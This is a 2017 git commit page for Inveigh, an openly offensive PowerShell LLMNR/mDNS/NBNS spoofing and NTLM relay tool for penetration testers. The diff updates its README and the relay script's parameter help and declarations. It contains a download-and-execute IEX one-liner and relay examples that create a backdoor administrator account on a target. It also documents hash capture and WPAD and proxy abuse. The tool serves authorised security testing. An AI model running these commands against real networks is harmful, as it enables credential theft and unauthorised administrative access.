diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2017-04-02 22:09:01 -0400 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2017-04-02 22:09:01 -0400 |
| commit | 0069276d8874ced0cfc3b72d54ce0c49b4de72c6 (patch) | |
| tree | 74ac73ad8217bc23dada19e15c248190ff01e43b | |
| parent | 5e0baa7b5fdd109d8c959205b3abc8dbbc5bdddb (diff) | |
| download | Inveigh-0069276d8874ced0cfc3b72d54ce0c49b4de72c6.tar.gz Inveigh-0069276d8874ced0cfc3b72d54ce0c49b4de72c6.zip | |
mDNS spoofer, log control, bug fixes
Added mDNS spoofer. Simplified some HTTP listener code. Added LogOutput
and ConsoleQueueLimit parameters to control in-memory log entry storage.
Fixed some bugs.
| -rw-r--r-- | README.md | 203 | ||||
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 1030 | ||||
| -rw-r--r-- | Scripts/Inveigh.ps1 | 1524 |
3 files changed, 1882 insertions, 875 deletions
@@ -1,5 +1,9 @@ -# Inveigh -Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool designed to assist penetration testers that find themselves limited to a Windows system. +# **Inveigh** + +Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. + +## Wiki +* https://github.com/Kevin-Robertson/Inveigh/wiki ## Included In * PowerShell Empire - https://github.com/PowerShellEmpire/Empire @@ -10,194 +14,23 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * pupy - https://github.com/n1nj4sec/pupy ## Special Thanks -* Anyone that posted .NET packet sniffing examples. -* Responder - https://github.com/SpiderLabs/Responder +* Anyone that posted .NET packet sniffing examples +* Responder - https://github.com/lgandx/Responder * Impacket - https://github.com/CoreSecurity/impacket -## Import -* To import with Import-Module: - Import-Module ./Inveigh.psd1 - -* To import using the dot source method: - . ./Inveigh.ps1 - . ./Inveigh-Relay.ps1 - -* To load into memory using Invoke-Expression: - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1") - -## System Requirements -* Tested minimums are PowerShell 2.0 and .NET 3.5 - -## Functions -* Invoke-Inveigh -* Invoke-InveighRelay -* Clear-Inveigh -* Get-Inveigh -* Stop-Inveigh -* Watch-Inveigh - -### Invoke-Inveigh -* The main Inveigh LLMNR/NBNS spoofer function. - -##### Features: -* IPv4 LLMNR/NBNS spoofer with granular control -* NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB -* Basic auth cleartext credential capture over HTTP/HTTPS -* WPAD server capable of hosting a basic or custom wpad.dat file -* HTTP/HTTPS server capable of hosting limited content -* Granular control of console and file output -* Run time control - -##### Notes: -* LLMNR/NBNS spoofing is performed by packet sniffing and responding through raw sockets. -* SMB challenge/response captures are performed by sniffing over the host system's SMB service. -* The local LLMNR/NBNS services do not need to be disabled on the host system. -* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. -* Ensure that any needed LMMNR, NBNS, SMB, HTTP, HTTPS ports are open within any local firewall on the host system. -* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. - -##### Examples: -* To execute with default settings: - Invoke-Inveigh - -* To load and execute with one line: - Import-Module ./Inveigh.ps1;Invoke-Inveigh - -* To execute with ConsoleOutput, FileOutput, and the NBNS spoofer enabled. - Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -NBNS Y - -##### Screenshot: - - -##### Parameters: -* __ElevatedPrivilege__ - Default = Auto: (Auto,Y,N) Set the privilege mode. Auto will determine if Inveigh is running with elevated privilege. If so, options that require elevated privilege can be used. -* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set. -* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. -* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning. -* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. -* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. -* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. -* __SpooferLearning__ - Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the hostname to a spoofing blacklist. The valid system must respond to the protocol type that matches the protocol of the original request in order to be blacklisted. -* __SpooferLearningDelay__ - (Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning. -* __SpooferLearningInterval__ - Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled. -* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. -* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. -* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet. -* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. -* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet. -* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name -* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. -* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer. -* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. -* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. -* __HTTPIP__ - Default = Any: IP address for the HTTP listener. -* __HTTPPort__ - Default = 80: TCP port for the HTTP listener. -* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPSPort__ - Default = 443: TCP port for the HTTPS listener. -* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. -* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. -* __HTTPContentType__ - Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse. -* __HTTPDir__ - Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. -* __HTTPDefaultFile__ - Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. -* __HTTPDefaultEXE__ - EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. -* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. -* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPSPort__ - Default = 443: TCP port for the HTTPS listener. -* __HTTPSCertIssuer__ - Default = Inveigh: The issuer field for the cert that will be installed for HTTPS. -* __HTTPSCertSubject__ - Default = localhost: The subject field for the cert that will be installed for HTTPS. -* __HTTPSForceCertDelete__ - Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. -* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. -* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. -* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. -* __WPADDirectFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. -* __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. -* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. -* __Proxy__ - Default = Disabled: (Y/N) Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures. -* __ProxyAuth__ - Default = NTLM: (Basic,NTLM,NTLMNoESS) Proxy server authentication type. -* __ProxyIP__ - Default = Any: IP address for the proxy listener. -* __ProxyPort__ - Default = 8492: TCP port for the proxy listener. -* __ProxyIgnore__ - Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening. -* __SMB__ - Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host. -* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. -* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __ConsoleOutput__ - Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. -* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. -* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. -* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. -* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled. -* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. -* __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. -* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __StartupChecks__ - Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup. -* __RunCount__ - Default = Unlimited: (Integer) Number of NTLMv1/NTLMv2 captures to perform before auto-exiting. -* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. -* __Inspect__ - (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. -* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire - -### Invoke-InveighRelay -* The NTLMv2 HTTP/HTTPS to SMB relay command execution function. This function can be used with or without Invoke-Inveigh. - -##### Features: -* HTTP/HTTPS to SMB NTLMv2 relay with granular control -* NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS -* Granular control of console and file output +At its core, Inveigh is a .NET packet sniffer that listens and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh’s HTTP/HTTPS/Proxy based features are not provided through the packet sniffer, they are provided through TCP listeners. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process. -##### Examples: -* To execute with basic options: - Invoke-Inveigh -HTTP N - Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" - -* To execute with and only perform SMB relay with the 'Administrator' account: - Invoke-InveighUnprivileged -HTTP N - Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" -SMBRelayUsernames Administrator +##### Inveigh running with elevated privilege + -##### Screenshot: - +Since the .NET packet sniffer requires elevated privilege, Inveigh also contains UDP listener based LLMNR/mDNS/NBNS functions. These listeners can provide the ability to perform spoofing with only unprivileged access. Port conflicts can still be an issue with any running Windows listeners bound to 0.0.0.0. This generally impacts LLMNR. On a system with the Windows LLMNR service running, Inveigh’s unprivileged LLMNR spoofer will not be able to start. Inveigh can generally perform unprivileged NBNS spoofing on systems with the NBNS service already running since it’s often not bound to 0.0.0.0. Most of Inveigh’s other features, with the primary exceptions of the packet sniffer’s SMB capture and HTTPS (due to certificate install privilege requirements), do not require elevated privilege. Note that an enabled local firewall blocking all relevant ports, and without a listed service with open firewall access suitable for migration, can still prevent Inveigh from working with just unprivileged access since privileged access will likely be needed to modify the firewall settings. -##### Parameters: -* __Command__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary. -* __Target__ - IP address of system to target for SMB relay. -* __Service__ - Default = 20 Character Random: Name of the service to create and delete on the target. -* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. -* __HTTPIP__ - Default = Any: IP address for the HTTP/HTTPS listener. -* __HTTPPort__ - Default = 80: TCP port for the HTTP listener. -* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPSCertIssuer__ - Default = Inveigh: The issuer field for the cert that will be installed for HTTPS. -* __HTTPSCertSubject__ - Default = localhost: The subject field for the cert that will be installed for HTTPS. -* __HTTPSForceCertDelete__ - Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. -* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. -* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. -* __Proxy__ - Default = Disabled: (Y/N) Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures. -* __ProxyIP__ - Default = Any: IP address for the proxy listener. -* __ProxyPort__ - Default = 8492: TCP port for the proxy listener. -* __ProxyIgnore__ - Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening. -* __Usernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. -* __RelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. -* __RelayAutoExit__ - Default = Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error. -* __ConsoleOutput__ - Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. -* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. -* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. -* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. -* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. -* __OutputStreamOnly__ - Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. -* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. -* __SMB1__ - (Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. -* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +By default, Inveigh will attempt to detect the privilege level and load the corresponding functions. -##### Notes: -* Ensure that any needed HTTP, HTTPS ports are open within any local firewall on the host system. -* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. +##### Inveigh running without elevated privilege + -### Support Functions -* __Clear-Inveigh__ - Clear Inveigh data from memory -* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames, POSTRequest, POSTRequestUnique -* __Stop-Inveigh__ - Stop all running Inveigh functions -* __Watch-Inveigh__ - Enable real time console output +Inveigh provides NTLMv1/NTLMv2 HTTP/HTTPS/Proxy to SMB1/SMB2 relay through the Inveigh-Relay module. This module does not require elevated privilege, again with the exception of HTTPS, on the Inveigh host. However, since the module currently only has a PSExec type command execution attack, the relayed challenge/response will need to be from an account that has remote command execution privilege on the target. The Inveigh host itself can be targeted for relay if the goal is local privilege escalation. -##### Screenshot: - +##### Inveigh and Inveigh-Relay running together to execute an Empire 2.0 launcher +
\ No newline at end of file diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index 983ac0c..6c71c9f 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -14,14 +14,35 @@ Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB1/SMB2 relay with psexe NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS Granular control of console and file output +.PARAMETER Challenge +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be +pulled from the SMB relay target. + .PARAMETER Command Command to execute on SMB relay target. Use PowerShell character escapes where necessary. -.PARAMETER Target -IP address of system to target for SMB relay. +.PARAMETER ConsoleOutput +Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a shell, test to +ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. -.PARAMETER Service -Default = 20 Character Random: Name of the service to create and delete on the target. +.PARAMETER ConsoleQueueLimit +Default = Unlimited: Maximum number of queued up console log entries when not using the real time console. + +.PARAMETER ConsoleStatus +(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for +displaying full capture lists when running through a shell that does not have access to the support functions. + +.PARAMETER ConsoleUnique +Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time console output is enabled. + +.PARAMETER FileOutput +Default = Disabled: (Y/N) Enable/Disable real time file output. + +.PARAMETER FileOutputDirectory +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be +enabled. .PARAMETER HTTP Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. @@ -34,8 +55,8 @@ Default = 80: TCP port for the HTTP listener. .PARAMETER HTTPS Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in -the local store and attached to port 443. If the script does not exit gracefully, manually remove the certificate. -This feature requires local administrator access. +the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires +local administrator access. .PARAMETER HTTPSPort Default = 443: TCP port for the HTTPS listener. @@ -49,17 +70,16 @@ Default = localhost: The subject field for the cert that will be installed for H .PARAMETER HTTPSForceCertDelete Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. -.PARAMETER Challenge -Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random -challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be -pulled from the SMB relay target. +.PARAMETER LogOutput +Default = Enabled: (Y/N) Enable/Disable storing log messages in memory. .PARAMETER MachineAccounts Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -.PARAMETER WPADAuth -Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to -Anonymous can prevent browser login prompts. +.PARAMETER OutputStreamOnly +Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if +running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the +various yellow warning messages if enabled. .PARAMETER ProxyRelay Default = Disabled: (Y/N): Enable/Disable relaying proxy authentication. @@ -78,10 +98,6 @@ cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening. -.PARAMETER Usernames -Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and -domain\username format. - .PARAMETER RelayAutoDisable Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on target. @@ -89,36 +105,15 @@ target. .PARAMETER RelayAutoExit Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error. -.PARAMETER ConsoleOutput -Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to -ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. - -.PARAMETER ConsoleStatus -(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for -displaying full capture lists when running through a shell that does not have access to the support functions. - -.PARAMETER ConsoleUnique -Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, -and username combinations when real time console output is enabled. - -.PARAMETER FileOutput -Default = Disabled: (Y/N) Enable/Disable real time file output. - -.PARAMETER StatusOutput -Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. - -.PARAMETER OutputStreamOnly -Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if -running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the -various yellow warning messages if enabled. - -.PARAMETER OutputDir -Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be -enabled. - .PARAMETER RunTime (Integer) Run time duration in minutes. +.PARAMETER Service +Default = 20 Character Random: Name of the service to create and delete on the target. + +.PARAMETER ShowHelp +Default = Enabled: (Y/N) Enable/Disable the help messages at startup. + .PARAMETER SMB1 (Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. @@ -126,14 +121,30 @@ target. .PARAMETER StartupChecks Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup. -.PARAMETER ShowHelp -Default = Enabled: (Y/N) Enable/Disable the help messages at startup. +.PARAMETER StatusOutput +Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. + +.PARAMETER Target +IP address of system to target for SMB relay. .PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's +Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. 0 = None, 1 = Metasploit/Meterpreter, 2 = Empire +.PARAMETER Usernames +Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and +domain\username format. + +.PARAMETER WPADAuth +Default = NTLM: (Anonymous/NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to +Anonymous can prevent browser login prompts. + +.PARAMETER WPADAuthIgnore +Default = Disabled: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login +popups for authenticated wpad.dat requests such as Firefox. + .EXAMPLE Invoke-Inveigh -HTTP N Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /add && net localgroup administrators Inveigh /add" @@ -146,39 +157,42 @@ https://github.com/Kevin-Robertson/Inveigh [CmdletBinding()] param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", [parameter(Mandatory=$false)][Array]$Usernames = "", + [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "", + [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1", [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", [parameter(Mandatory=$false)][Int]$HTTPPort = "80", [parameter(Mandatory=$false)][Int]$HTTPSPort = "443", [parameter(Mandatory=$false)][Int]$ProxyPort = "8492", [parameter(Mandatory=$false)][Int]$RunTime = "", + [parameter(Mandatory=$true)][String]$Command = "", [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh", [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost", [parameter(Mandatory=$false)][String]$Service, - [parameter(Mandatory=$true)][String]$Command = "", [parameter(Mandatory=$true)][String]$Target = "", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", 